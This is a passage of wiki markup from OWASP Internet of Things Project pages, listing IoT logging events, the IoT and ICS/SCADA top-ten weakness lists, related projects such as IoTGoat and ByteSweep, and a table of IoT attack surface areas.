* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255231OWASP Internet of Things Project2019-10-04T17:38:29Z<p>Aaron.guzman: </p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT security analysis platform. This platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware. A Free Software IoT Firmware Security Analysis Platform<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
